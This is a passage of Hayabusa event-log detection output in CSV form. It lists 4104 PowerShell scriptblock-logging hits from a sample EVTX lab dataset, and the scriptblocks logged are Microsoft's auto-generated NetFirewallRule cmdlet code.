$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { 
[object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 